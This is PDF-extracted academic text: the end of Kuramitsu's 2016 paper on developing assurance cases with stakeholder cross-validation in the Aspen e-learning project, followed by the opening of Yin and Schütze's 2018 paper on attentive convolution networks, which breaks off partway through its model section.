we identify stakeholders by role names–Owner, Developer, Operator, and User–for readability. However, on the assurance cases, stakeholders are identified by a personal name for the sake of accountability. Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 8/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.101 Development procedure In the experiment, we attempt to develop assurance cases in parallel with the development and service operation of the Aspen system. All assurance cases and other communications between stakeholders are written and spoken in Japanese. In the planning stage, the owner defines the top claim, which includes dependability goals and assumptions, for which the Aspen system is assumed to deliver correct services for the users. Following the planning stage, we undertake the Aspen system with the following procedures: • The developer claims that the developed system meets the owner’s dependability goals with supporting evidence. • The operator, the user, and the owner review the developer’s claims and agree or disagree. • The operator, based on the developed system, claims that the system operation meets the owner’s dependability goals with supporting evidence. • The developer, the user, and the owner review the operator’s claims and come to agreements on the conflicted claims. • Any stakeholder can revise the assurance cases if they contain any insufficiencies or flaws. As shown above, we focus on dependability-related issues and avoid general issues with software implementations and operating procedures. When we handle the disagreement, we ask all stakeholders to meet together at the same place to agree on the conflicts. ASPEN CASES The Aspen cases were developed with the method that we proposed in the ‘Argumentation Architecture’ and ‘Experimental Setup: Aspen Project’ sections. This section reports how the arguments are organized with a fragment of GSNs and excerpted from the developed assurance cases. Overview First, we overview the statistics of the Aspen cases. As we described in ‘Stakeholders1’, the Aspen cases are written in GSN. We first gave the top goal, which was decomposed into the Development stage, the Service stage, and the Evolution stage with common assumptions. The GSNs were revised 40 times throughout the Aspen project. Here we use #n to represent the nth revision. The GSN document grew from four elements (at #1) to 134 elements (at #40). We identify the major revisions as follows: • #2 Initial requirement • #12 Development • #22 Development agreement • #27 Service design Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 9/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.101 0 5 10 15 20 25 30 35 40 45 50 Planing #2 Development #52 Development Agreement #22 Service Design #27 Service Agreement #29 Failure Recovery #35 System EvoluBon #40 N um be r of G SN E le m en ts # of Goals # of Context # of Evidence # of RebuIal Figure 6 Growth of assurance cases in GSN elements. • #29 Service agreement • #35 Failure recovery • #40 Service evolution. Figure 6 shows the growth of the Aspen cases in the number of GSN elements: goals, contexts, evidences, and rebuttals. The increase in contexts suggests that the reduced ambiguity of the goals and the increase of evidence reduce the reduced uncertainty in their dependability claims. In the remainder of this section we close up the development agreement (#2–#20), the service agreement (#27–#29), the failure recovery (#35), and the system evolution (#40). Development agreement The developer started the argument with the claim ‘‘Aspen is dependable’’ and decomposed it into sub-claims by dependability attributes (cf. Aspen is available, integral, safe, etc.). The forms of evidence that the developer provided were mostly other external experience reports (collected from the Internet). Some goals included a lack of evidence. Note that a lack of evidence does not directly imply a lack of dependability, but it does indicate uncertainty about dependability. Figure 7 illustrates the fragment with the developer’s claim that the software is integral in data storage. One could consider that Evidence E22.1 was not reasonable evidence to support Claim G22. Likewise, the operator pointed out a risk of hardware failure in the disk storage. However, there was not enough time to change the storage system. Instead, Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 10/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.101 S8.2 Arguing over type of data G12 Data never loses. G22 Submitted program never lose. E22.1 The programs are stored in git C22.2 Rebuttal: Lack of data backups G22 Student activities never lose. Owner Operator Operator Operator Developer Operator Figure 7 Example of a rebuttal by the operator’s review. the operator agreed to fault tolerance at the time of operation. In the end, the operator made nine rebuttals to the developer’s claim prior to the operations. Service agreement In the operation stage, we focus only on fault mitigation and failure recovery. The operator led the arguments of this part using the fault-avoidance pattern, which consists of the following two parts: • The symptom of a failure (an error) is detectable (by monitoring). • The detected symptom is mitigated before the service stops. The completeness of fault-avoidance analysis is important but not pursued in the experiment, in part because we want to evaluate the iterative updates of assurance cases during the operations. Figure 8 is a fragment of assurance cases arguing about the server’s availability. Note that some embedded parameters are used for operation scripts (Kuramitsu, 2013). One could consider the given evidence questionable, but the user and the owner trusted the operator’s claim without any doubt due to their limited knowledge. They did not make any rebuttals against the operator, except for some help-desk support in case of service failures. Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 11/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.101 S10.1 Arguing over type of errors G10 Symptoms of a failure are detectable. G25 Network overload is detectable. E25.3 Zabbix monitor is installed. Owner Operator Owner Operator C25.1 Assumed users who access at the same time is < 5 Operator G26 CPU overload is detectable. E26.3 Zabbix monitor is installed. Owner Operator C26.1 Load average w >10 is defined as errors Operator Figure 8 Example of arguments on failure avoidance in operation. Failure recovery We encountered several service failures while running the Aspen system. Since unexpected failures imply faulty arguments, the operator or the developer needs to revise the assurance cases. Here, we highlight a service failure that occurred in the middle of the classroom. This failure appeared only when students used Aspen in the classroom. The system monitor indicated that the server’s operating system was unexpectedly down. At first, the operator suspected that there were unknown bugs in the Aspen system. Unfortunately, the developer found some bugs that seemed related to the service failure. If there were no assurance cases, they used an incorrect method to recover the service failure. In reviewing assurance cases, the claim ‘‘the servers can scale out’’ was overconfident. The operator never tested the server in any network traffic settings. However, no one pointed out that this claim seemed faulty. After the server problem occurred, the operator recognized that the scale-out setting was incapable of handling simultaneous access by 40 students in the classroom. The instructor strongly requested that the operator should increase the servers as the operator had claimed in the assurance cases. Another serious dependability problem was found later in the context of the top goal, which described common assumptions about the Aspen system. Originally, the Aspen system was assumed to allow 100 students to submit their assignments from home computers. Based on this assumption, the maximum simultaneous access was estimated to be at most five connections. The number of students in the classroom was fewer than 100 students, but the density of access traffic differed from the estimated patterns. In other Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 12/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.101 words, the top-goal assumption was a sort of bug, which resulting in rechecking all given evidence. System evolution The Aspen project ran for two years. In the second year, the Aspen system evolved with the following major updates: • The adoption of Moodle, an open-source solution to reduce in-house development • A system movement to Amazon Web Services (a standard cloud computing platform). These system updates were not random but derived from several dependability goals and potential risks that were argued in the revised assurance cases. More importantly, all stakeholders, including those who were newly involved in the Aspen projects, could share the justification of these system updates in terms of dependability improvements. Compared to unstructured e-mail communications, the GSN-formed arguments made it easier to trace dependability problems that actually happened or were expected in the first year. LESSONS LEARNED AND DISCUSSIONS This section describes lessons we learned throughout the Aspen case in the form of answering research questions. (Question 1). Do non-experts join dependability arguments with GSNs? Yes. For all of the participants, the concept of assurance cases was totally new, and they were suspicious of the assurance cases’ benefits. We gave them about a 1-hour technical lecture on the notation of GSN (not the concept of assurance cases itself.) This short lecture and a Web-based GSN viewer were all we prepared for participants to read GSNs for dependability arguments. Note that organizing dependability arguments is a known difficulty according to Bloomfield & Bishop (2010). We prepared several simple argument patterns, which are described in ‘Experimental Setup: Aspen Project’. Due to the argument patterns, arguments grew in a well-structured way. (Question 2). What was the hardest part in the development of continuously revised assurance cases? Collecting acceptable evidence for their dependability claims was difficult and costly. In part because the assurance cases were new for both the developers and the operators, they did not prepare any forms of evidence in their process. For example, the developers performed many software tests as usual, but these test results were far from those requested in the non-functional arguments. Neither the developers nor the operators wanted to spend extra resources for evidence, while competing stakeholders always requested much more evidence. Perhaps dependability guidelines are necessary to reach agreement on proper forms and levels of evidence. (Question 3). Did stakeholders really validate others’ claims? Yes, they were willing to review and tried to validate them. Rebuttal serves an enforced communication vehicle between stakeholders. One reason for their many responses was that Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 13/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.101 we introduced some penalty (e.g., sharing responsibilities in failure cases) for no-rebuttal claims. This penalty seemed unrealistic but forced all stakeholders to find faulty claims. The activity of cross-validation can be measured by the number of revisions and the growth of GSN elements: • 10 revisions for the development claims • two revisions for the operation claims. The development claims were revised more often than the operation claims. The difference comes mainly from the stakeholders’ expertise. The users were likely to trust the operator’s claims and evidence. (Lesson 5). Is the stakeholder cross-validation strong enough? The answer is that the strength depends on stakeholders’ expertise. The dependability arguments between developers and operators seemingly worked. System failures that occurred in the Aspen system were caused by bad operations, not a flaw in the developed software. On the other hand, the users lacked the knowledge of service operations, and they could not point out any weaknesses in the operators’ claims documented in the assurance cases. However, the faulty claims were costly in cases of system failures because the users strongly requested the fulfillment of the operator’s claims as documented. We expected that the GSN documentation became a strong incentive for operators to avoid faulty claims. In reality, the costs of collecting evidence overwhelmed such incentives. (Question 6). Is the development of assurance cases useful in software? The answer is positively yes. Our finding in the case analysis of failure recovery suggests that the developed assurance cases make it easier to find dependability problems throughout structured arguments in GSNs. Even if we are not able to avoid the service failure the first time, the dependability problems can be transferred clearly in the redevelopment phase. Since transferring dependability problems across the organization is a missing part in dependability engineering, the contentiously revised assurance cases can bridge the missing part. CONCLUSION Recently, assurance cases have received much attention in the field of software-based computer systems and IT services. However, software often changes, and there are no strong regulations for software. These facts make the use of software assurance cases more difficult. We proposed a development method for assurance cases with stakeholder cross-validation at every stage of the system life cycle, including in operation and service recovery in a case of system failure. This paper reported our practitioner experience based on the Aspen project. As we expected, stakeholders competing with each other were well motivated to find the faulty claims of the others in the GSN documents. This improves the quality of dependability arguments. Unfortunately, the stakeholder cross-validation was not able to avoid simple system failures in advance. The case analysis of failure recovery with assurance cases suggests that dependability problems can be easily transferred in a structured way across Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 14/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.101 stakeholders and organizations. Since transferring dependability problems is an important missing part of long-term dependability, continuously revised assurance cases may serve as a potential new approach to the long-term improvement of service dependability. In future work, we will investigate the dependability effect of assurance cases from a longer-term perspective. ACKNOWLEDGEMENTS The authors thank to all the DEOS research members, especially Mario Tokoro, Shuichiro Yamamoto, Yutaka Matsuno, Midori Sugaya, Yoshiki Kinoshita, Makoto Takeyama, and Makoto Yashiro. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the JST/CREST grant ‘‘Dependable Embedded Operating Systems for Practical Uses.’’ The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the author: JST/CREST. Competing Interests The author declares there are no competing interests. Author Contributions • Kimio Kuramitsu conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper, funding. Data Availability The following information was supplied regarding data availability: The raw data has been supplied as a Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.101#supplemental-information. REFERENCES Avizienis A, Laprie J-C, Randell B, Landwehr CE. 2004. Basic concepts and taxonomy of dependable and secure computing. IEEE Transactions on Dependable and Secure Computing 1(1):11–33 DOI 10.1109/TDSC.2004.2. Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 15/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.101/supplemental-information http://dx.doi.org/10.7717/peerj-cs.101#supplemental-information http://dx.doi.org/10.7717/peerj-cs.101#supplemental-information http://dx.doi.org/10.1109/TDSC.2004.2 http://dx.doi.org/10.7717/peerj-cs.101 Bloomfield R. 2013. Open assurance. Security Privacy, IEEE 11(5):3–4 DOI 10.1109/MSP.2013.119. Bloomfield RE, Bishop PG. 2010. Safety and assurance cases: past, present and possible future—an adelard perspective. In: Making systems safer—proceedings of the eigh- teenth safety-critical systems symposium, Bristol, UK, February 9–11, 2010. 51–67 DOI 10.1007/978-1-84996-086-1-4. Denney E, Habli I, Pai G. 2012. Perspectives on software safety case development for unmanned aircraft. In: Proceedings of the 42nd annual IEEE/IFIP international conference on dependable systems and networks (DSN 2012). Piscataway: IEEE. Despotou G, White S, Kelly T, Ryan M. 2012. Introducing safety cases for health IT. In: Proceedings of the 4th international workshop on software engineering in health care. Piscataway: IEEE, 44–50. Graydon P, Habli I, Hawkins R, Kelly T, Knight J. 2012. Arguing conformance. IEEE Software 29(3):50–57 DOI 10.1109/MS.2012.26. Graydon PJ, Knight JC, Strunk E. 2007. Assurance based development of critical systems. In: Dependable systems and networks, 2007. DSN’07. 37th annual IEEE/IFIP international conference on. Piscataway: IEEE, 347–357. Haeberlen A, Kouznetsov P, Druschel P. 2007. PeerReview: practical accountabil- ity for distributed systems. In: Proceedings of twenty-first ACM SIGOPS sym- posium on operating systems principles, SOSP ’07. New York: ACM, 175–188 DOI 10.1145/1294261.1294279978-1-59593-591-5. Hawkins R, Clegg K, Alexander R, Kelly T. 2011. Using a software safety argument pattern catalogue: two case studies. In: Proceedings of the 30th international conference on computer safety, reliability, and security, SAFECOMP’11. Berlin: Springer-Verlag, 185–198. Hawkins R, Habli I, Kelly T, McDermid J. 2013. Assurance cases and prescrip- tive software safety certification: a comparative study. Safety Science 59:55–71 DOI 10.1016/j.ssci.2013.04.007. Hawkins R, Miyazawa A, Cavalcanti A, Kelly T, Rowlands J. 2014. Assurance cases for block-configurable software. In: Proceedings of the 33rd international conference on computer safety, reliability, and security—volume 8666, SAFECOMP 2014. New York: Springer-Verlag New York, Inc., 155–169 DOI 10.1007/978-3-319-10506-2-11978-3-319-10505-5. Jee E, Lee I, Sokolsky O. 2010. Assurance cases in model-driven development of the pacemaker software. In: Leveraging applications of formal methods, verification, and validation—4th international symposium on leveraging applications, ISoLA 2010, Heraklion, Crete, Greece, October 18–21, 2010, proceedings, part II. Lecture notes in computer science, vol. 6416. Berlin Heidelberg: Springer, 343–356. Kelly T. 2007. Reviewing assurance arguments-a step-by-step approach. In: Workshop on assurance cases for security-the metrics challenge, dependable systems and networks (DSN). Available at https://www-users.cs.york.ac.uk/tpk/dsnworkshop07.pdf . Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 16/17 https://peerj.com http://dx.doi.org/10.1109/MSP.2013.119 http://dx.doi.org/10.1007/978-1-84996-086-1-4 http://dx.doi.org/10.1109/MS.2012.26 http://dx.doi.org/10.1145/1294261.1294279978-1-59593-591-5 http://dx.doi.org/10.1016/j.ssci.2013.04.007 http://dx.doi.org/10.1007/978-3-319-10506-2-11978-3-319-10505-5 https://www-users.cs.york.ac.uk/tpk/dsnworkshop07.pdf http://dx.doi.org/10.7717/peerj-cs.101 Kelly T, Weaver R. 2004. The goal structuring notation—a safety argument notation. In: Proceedings of the workshop on assurance cases, international conference on dependable systems and networks. Available at https://www-users.cs.york.ac.uk/tpk/dsn2004.pdf . Kim B, Ayoub A, Sokolsky O, Lee I, Jones P, Zhang Y, Jetley R. 2011. Safety-assured development of the GPCA infusion pump software. In: Proceedings of the ninth ACM international conference on embedded software, EMSOFT ’11. New York: ACM, 155–164 DOI 10.1145/2038642.2038667978-1-4503-0714-7. Kuramitsu K. 2013. D-script: dependable scripting with DEOS process. In: IEEE symposium on software reliability engineering workshops (ISSREW). Piscataway: IEEE, 326–330. Ruiz A, Melzi A, Kelly T. 2015. Systematic application of ISO 26262 on a SEooC: support by applying a systematic reuse approach. In: Proceedings of the 2015 design, automation & test in europe conference & exhibition, DATE ’15. San Jose: EDA Consortium, 393–396. Shida S, Uchida A, Ishii M, Ide M, Kuramitsu K. 2013. Assure-It: a runtime synchro- nization tool of assurance cases. In: Safecomp 2013 fastabstract. Available at https: //hal.archives-ouvertes.fr/hal-00926410/ . Tokoro M (ed.) 2015. Open systems dependability: dependability engineering for ever- changing systems. Second edition. Boca Raton: CRC Press. Weaver R, McDermid J, Kelly T. 2002. Software safety arguments: towards a systematic categorisation of evidence. International System Safety Conference, Denver, CO. Yuan T, Kelly T. 2012. Argument-based approach to computer system safety engi- neering. International Journal of Critical Computer-Based Systems 3(3):151–167 DOI 10.1504/IJCCBS.2012.050295. Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 17/17 https://peerj.com https://www-users.cs.york.ac.uk/tpk/dsn2004.pdf http://dx.doi.org/10.1145/2038642.2038667978-1-4503-0714-7 https://hal.archives-ouvertes.fr/hal-00926410/ https://hal.archives-ouvertes.fr/hal-00926410/ http://dx.doi.org/10.1504/IJCCBS.2012.050295 http://dx.doi.org/10.7717/peerj-cs.101 work_eopg7ki7vjcg7lxczmnt7oaeqq ---- Attentive Convolution: Equipping CNNs with RNN-style Attention Mechanisms Wenpeng Yin Department of Computer and Information Science, University of Pennsylvania wenpeng@seas.upenn.edu Hinrich Schütze Center for Information and Language Processing, LMU Munich, Germany inquiries@cislmu.org Abstract In NLP, convolutional neural networks (CNNs) have benefited less than recur- rent neural networks (RNNs) from attention mechanisms. We hypothesize that this is be- cause the attention in CNNs has been mainly implemented as attentive pooling (i.e., it is applied to pooling) rather than as attentive convolution (i.e., it is integrated into con- volution). Convolution is the differentiator of CNNs in that it can powerfully model the higher-level representation of a word by taking into account its local fixed-size con- text in the input text tx. In this work, we propose an attentive convolution network, ATTCONV. It extends the context scope of the convolution operation, deriving higher- level features for a word not only from local context, but also from information ex- tracted from nonlocal context by the atten- tion mechanism commonly used in RNNs. This nonlocal context can come (i) from parts of the input text tx that are distant or (ii) from extra (i.e., external) contexts ty. Experiments on sentence modeling with zero-context (sentiment analysis), single- context (textual entailment) and multiple- context (claim verification) demonstrate the effectiveness of ATTCONV in sentence rep- resentation learning with the incorporation of context. In particular, attentive convo- lution outperforms attentive pooling and is a strong competitor to popular attentive RNNs.1 1 Introduction Natural language processing (NLP) has benefited greatly from the resurgence of deep neural net- works (DNNs), thanks to their high performance with less need of engineered features. A DNN typ- ically is composed of a stack of non-linear trans- 1https://github.com/yinwenpeng/Attentive_ Convolution. formation layers, each generating a hidden rep- resentation for the input by projecting the output of a preceding layer into a new space. To date, building a single and static representation to ex- press an input across diverse problems is far from satisfactory. Instead, it is preferable that the rep- resentation of the input vary in different applica- tion scenarios. In response, attention mechanisms (Graves, 2013; Graves et al., 2014) have been pro- posed to dynamically focus on parts of the in- put that are expected to be more specific to the problem. They are mostly implemented based on fine-grained alignments between two pieces of ob- jects, each emitting a dynamic soft-selection to the components of the other, so that the selected ele- ments dominate in the output hidden representa- tion. Attention-based DNNs have demonstrated good performance on many tasks. Convolutional neural networks (CNNs; LeCun et al., 1998) and recurrent neural networks (RNNs; Elman, 1990) are two important types of DNNs. Most work on attention has been done for RNNs. Attention-based RNNs typically take three types of inputs to make a decision at the current step: (i) the current input state, (ii) a representation of local context (computed unidirectionally or bidi- rectionally; Rocktäschel et al. [2016]), and (iii) the attention-weighted sum of hidden states cor- responding to nonlocal context (e.g., the hidden states of the encoder in neural machine translation; Bahdanau et al. [2015]). An important question, therefore, is whether CNNs can benefit from such an attention mechanism as well, and how. This is our technical motivation. Our second motivation is natural language un- derstanding. In generic sentence modeling without extra context (Collobert et al., 2011; Kalchbrenner et al., 2014; Kim, 2014), CNNs learn sentence rep- resentations by composing word representations that are conditioned on a local context window. We believe that attentive convolution is needed 687 Transactions of the Association for Computational Linguistics, vol. 6, pp. 687–702, 2018. Action Editor: Slav Petrov. Submission batch: 6/2018; Revision batch: 10/2018; Published 12/2018. c© 2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. https://github.com/yinwenpeng/Attentive_Convolution https://github.com/yinwenpeng/Attentive_Convolution premise, modeled as context ty Plant cells have structures that animal cells lack. 0 Animal cells do not have cell walls. 1 The cell wall is not a freestanding structure. 0 Plant cells possess a cell wall, animals never. 1 Table 1: Examples of four premises for the hypothesis tx = “A cell wall is not present in animal cells.” in SCITAIL data set. Right column (hypothesis’s label): “1” means true, “0” otherwise. for some natural language understanding tasks that are essentially sentence modeling within contexts. Examples: textual entailment (is a hypothesis true given a premise as the single context?; Dagan et al. [2013]) and claim verification (is a claim cor- rect given extracted evidence snippets from a text corpus as the context?; Thorne et al. [2018]). Con- sider the SCITAIL (Khot et al., 2018) textual en- tailment examples in Table 1; here, the input text tx is the hypothesis and each premise is a context text ty. And consider the illustration of claim ver- ification in Figure 1; here, the input text tx is the claim and ty can consist of multiple pieces of con- text. In both cases, we would like the representa- tion of tx to be context-specific. In this work, we propose attentive convolution networks, ATTCONV, to model a sentence (i.e., tx) either in intra-context (where ty = tx) or extra- context (where ty 6= tx and ty can have many pieces) scenarios. In the intra-context case (sen- timent analysis, for example), ATTCONV extends the local context window of standard CNNs to cover the entire input text tx. In the extra-context case, ATTCONV extends the local context win- dow to cover accompanying contexts ty. For a convolution operation over a window in tx such as (leftcontext, word, rightcontext), we first compare the representation of word with all hidden states in the context ty to obtain an attentive context representation attcontext, then convolution filters derive a higher-level represen- tation for word, denoted as wordnew, by integrat- ing word with three pieces of context: leftcontext, rightcontext, and attcontext. We interpret this at- tentive convolution in two perspectives. (i) For intra-context, a higher-level word representation wordnew is learned by considering the local (i.e., leftcontext and rightcontext) as well as nonlocal (i.e., attcontext) context. (ii) For extra-context, wordnew is generated to represent word, together with its cross-text alignment attcontext, in the context leftcontext and rightcontext. In other words, the deci- sion for the word is made based on the connected maybe ha oyofajrfngn ovajrnvhar yaojnbarlvjh nhjarnohg nvhyhnv va j maybe ha oyofajrfngn ovajrnvhar yaojnbarlvjh nhjarnohg nvhyhnv va j whatno jmof jag as ajgonah nbjunaeorg varguoergu arg ag . arghoguerng mao rhg aer are hn kvar enb bhebn bnjb ye nerb hbjanrih bjrbn areb ahofjrf Marilyn Monroe worked with Warner Brothers Telemundo is an English-language television network. c1 c2 ci cn ... contexts claim classes Figure 1: Verify claims in contexts. hidden states of cross-text aligned terms, with local context. We apply ATTCONV to three sentence mod- eling tasks with variable-size context: a large- scale Yelp sentiment classification task (Lin et al., 2017) (intra-context, i.e., no additional context), SCITAIL textual entailment (Khot et al., 2018) (single extra-context), and claim verification (Thorne et al., 2018) (multiple extra-contexts). ATTCONV outperforms competitive DNNs with and without attention and achieves state-of-the-art on the three tasks. Overall, we make the following contributions: • This is the first work that equips convolution filters with the attention mechanism com- monly used in RNNs. • We distinguish and build flexible modules— attention source, attention focus, and atten- tion beneficiary—to greatly advance the ex- pressivity of attention mechanisms in CNNs. • ATTCONV provides a new way to broaden the originally constrained scope of filters in conventional CNNs. Broader and richer con- text comes from either external context (i.e., ty) or the sentence itself (i.e., tx). • ATTCONV shows its flexibility and effec- tiveness in sentence modeling with variable- size context. 2 Related Work In this section we discuss attention-related DNNs in NLP, the most relevant work for our paper. 2.1 RNNs with Attention Graves (2013) and Graves et al. (2014) first in- troduced a differentiable attention mechanism that allows RNNs to focus on different parts of the input. This idea has been broadly explored in RNNs, shown in Figure 2, to deal with text generation, such as neural machine translation 688 weighted sum attentive context sentence ty sentence tx hidden states Figure 2: A simplified illustration of attention mecha- nism in RNNs. (Bahdanau et al., 2015; Luong et al., 2015; Kim et al., 2017; Libovický and Helcl, 2017), response generation in social media (Shang et al., 2015), document reconstruction (Li et al., 2015), and document summarization (Nallapati et al., 2016); machine comprehension (Hermann et al., 2015; Kumar et al., 2016; Xiong et al., 2016; Seo et al., 2017; Wang and Jiang, 2017; Xiong et al., 2017; Wang et al., 2017a); and sentence relation classi- fication, such as textual entailment (Cheng et al., 2016; Rocktäschel et al., 2016; Wang and Jiang, 2016; Wang et al., 2017b; Chen et al., 2017b) and answer sentence selection (Miao et al., 2016). We try to explore the RNN-style attention mech- anisms in CNNs—more specifically, in convolution. 2.2 CNNs with Attention In NLP, there is little work on attention-based CNNs. Gehring et al. (2017) propose an attention- based convolutional seq-to-seq model for machine translation. Both the encoder and decoder are hi- erarchical convolution layers. At the nth layer of the decoder, the output hidden state of a convolu- tion queries each of the encoder-side hidden states, then a weighted sum of all encoder hidden states is added to the decoder hidden state, and finally this updated hidden state is fed to the convolution at layer n + 1. Their attention implementation re- lies on the existence of a multi-layer convolution structure—otherwise the weighted context from the encoder side could not play a role in the de- coder. So essentially their attention is achieved af- ter convolution. In contrast, we aim to modify the vanilla convolution, so that CNNs with attentive convolution can be applied more broadly. We discuss two systems that are representative of CNNs that implement the attention in pooling (i.e., the convolution is still not affected): Yin et al. (2016) and dos Santos et al. (2016), illus- trated in Figure 3. Specifically, these two systems work on two input sentences, each with a set of convolution convolution inter-hidden-state match column-wise compose row-wise compose sentence tx sentence ty word embedding layer hidden states layer X Y X ⋅ softmax( ) Y ⋅ softmax( ) representation :t x representation :t y (4 × 6) matching scores Figure 3: Attentive pooling, summarized from ABCNN (Yin et al., 2016) and APCNN (dos Santos et al., 2016). hidden states generated by a convolution layer; then, each sentence will learn a weight for ev- ery hidden state by comparing this hidden state with all hidden states in the other sentence; finally, each input sentence obtains a representation by a weighted mean pooling over all its hidden states. The core component—weighted mean pooling— was referred to as “attentive pooling,” aiming to yield the sentence representation. In contrast to attentive convolution, attentive pooling does not connect directly the hidden states of cross-text aligned phrases in a fine-grained manner to the final decision making; only the matching scores contribute to the final weighting in mean pooling. This important distinction be- tween attentive convolution and attentive pooling is further discussed in Section 3.3. Inspired by the attention mechanisms in RNNs, we assume that it is the hidden states of aligned phrases rather than their matching scores that can better contribute to representation learning and deci- sion making. Hence, our attentive convolution differs from attentive pooling in that it uses attended hidden states from extra context (i.e., ty) or broader-range context within tx to participate in the convolution. In experiments, we will show its superiority. 3 ATTCONV Model We use bold uppercase (e.g., H) for matrices; bold lowercase (e.g., h) for vectors; bold lower- case with index (e.g., hi) for columns of H; and non-bold lowercase for scalars. 689 ci hi hi+1 sentence tx context ty attentive context attentive convolution Layer n Layer n+1 hi-1 (a) Light attentive convolution layer matching attentive context attentive convolution fbene(Hx) fmgran(Hx) fmgran(Hy) Layer n Layer n+1 source focus beneficiary sentence tx context ty (b) Advanced attentive convolution layer Figure 4: ATTCONV models sentence tx with context ty. To start, we assume that a piece of text t (t ∈ {tx, ty}) is represented as a sequence of hidden states hi ∈ Rd (i = 1, 2, . . . , |t|), forming feature map H ∈ Rd×|t|, where d is the dimensionality of hidden states. Each hidden state hi has its left context li and right context ri. In concrete CNN systems, contexts li and ri can cover multiple adja- cent hidden states; we set li = hi−1 and ri = hi+1 for simplicity in the following description. We now describe light and advanced versions of ATTCONV. Recall that ATTCONVaims to com- pute a representation for tx in a way that convolu- tion filters encode not only local context, but also attentive context over ty. 3.1 Light ATTCONV Figure 4(a) shows the light version of ATTCONV. It differs in two key points—(i) and (ii)—both from the basic convolution layer that models a sin- gle piece of text and from the Siamese CNN that models two text pieces in parallel. (i) A match- ing function determines how relevant each hidden state in the context ty is to the current hidden state hxi in sentence t x. We then compute an average of the hidden states in the context ty, weighted by the matching scores, to get the attentive context cxi for h x i . (ii) The convolution for position i in tx integrates hidden state hxi with three sources of context: left context hxi−1, right context h x i+1, and attentive context cxi . Attentive Context. First, a function generates a matching score ei,j between a hidden state in tx and a hidden state in ty by (i) dot product: ei,j = (hxi ) T · hyj (1) or (ii) bilinear form: ei,j = (hxi ) T Weh y j (2) (where We ∈ Rd×d), or (iii) additive projection: ei,j = (ve) T · tanh(We ·hxi + Ue ·h y j ) (3) where We, Ue ∈ Rd×d and ve ∈ Rd. Given the matching scores, the attentive context cxi for hidden state h x i is the weighted average of all hidden states in ty: cxi = ∑ j softmax(ei)j ·h y j (4) We refer to the concatenation of attentive contexts [cx1; . . . ; c x i ; . . . ; c x |tx|] as the feature map C x ∈ Rd×|t x| for tx. Attentive Convolution. After attentive context has been computed, a position i in the sentence tx has a hidden state hxi , the left context h x i−1, the right context hxi+1, and the attentive context c x i . Attentive convolution then generates the higher- level hidden state at position i: hxi,new = tanh(W · [h x i−1, h x i , h x i+1, c x i ] + b) (5) = tanh(W1 · [hxi−1, h x i , h x i+1]+ W2 ·cxi + b) (6) where W ∈ Rd×4d is the concatenation of W1 ∈ Rd×3d and W2 ∈ Rd×d, b ∈ Rd. As Equation (6) shows, Equation (5) can be achieved by summing up the results of two separate and parallel convolution steps before the non-linearity. The first is still a standard convolution-without-attention over feature map Hx by filter width 3 over the window (hxi−1, h x i , hxi+1). The second is a convolution on the feature map Cx (i.e., the attentive context) with filter width 1 (i.e., over each cxi ); then we sum up the 690 role text premise Three firefighters come out of subway station hypothesis Three firefighters putting out a fire inside of a subway station Table 2: Multi-granular alignments required in textual entailment. results element-wise and add a bias term and the non- linearity. This divide-then-compose strategy makes the attentive convolution easy to implement in practice, with no need to create a new feature map, as required in Equation (5), to integrate Hx and Cx. It is worth mentioning that W1 ∈ Rd×3d cor- responds to the filter parameters of a vanilla CNN and the only added parameter here is W2 ∈ Rd×d, which only depends on the hidden size. This light ATTCONV shows the basic princi- ples of using RNN-style attention mechanisms in convolution. Our experiments show that this light version of ATTCONV—even though it incurs a limited increase of parameters (i.e., W2)—works much better than the vanilla Siamese CNN and some of the pioneering attentive RNNs. The fol- lowing two considerations show that there is space to improve its expressivity. (i) Higher-level or more abstract representa- tions are required in subsequent layers. We find that directly forwarding the hidden states in tx or ty to the matching process does not work well in some tasks. Pre-learning some more high-level or abstract representations helps in subsequent learn- ing phases. (ii) Multi-granular alignments are preferred in the interaction modeling between tx and ty. Table 2 shows another example of textual entail- ment. On the unigram level, “out” in the premise matches with “out” in the hypothesis perfectly, whereas “out” in the premise is contradictory to “inside” in the hypothesis. But their context snippets—“come out” in the premise and “putting out a fire” in the hypothesis—clearly indicate that they are not semantically equivalent. And the gold conclusion for this pair is “neutral” (i.e., the hypothesis is possibly true). Therefore, matching should be conducted across phrase granularities. We now present advanced ATTCONV. It is more expressive and modular, based on the two forego- ing considerations (i) and (ii). 3.2 Advanced ATTCONV Adel and Schütze (2017) distinguish between focus and source of attention. The focus of atten- tion is the layer of the network that is reweighted by attention weights. The source of attention is the information source that is used to compute the attention weights. Adel and Schütze showed that increasing the scope of the attention source is beneficial. It possesses some preliminary princi- ples of the query/key/value distinction by Vaswani et al. (2017). Here, we further extend this princi- ple to define beneficiary of attention – the feature map (labeled “beneficiary” in Figure 4(b)) that is contextualized by the attentive context (labeled “attentive context” in Figure 4(b)). In the light attentive convolutional layer (Figure 4(a)), the source of attention is hidden states in sentence tx, the focus of attention is hidden states of the con- text ty, and the 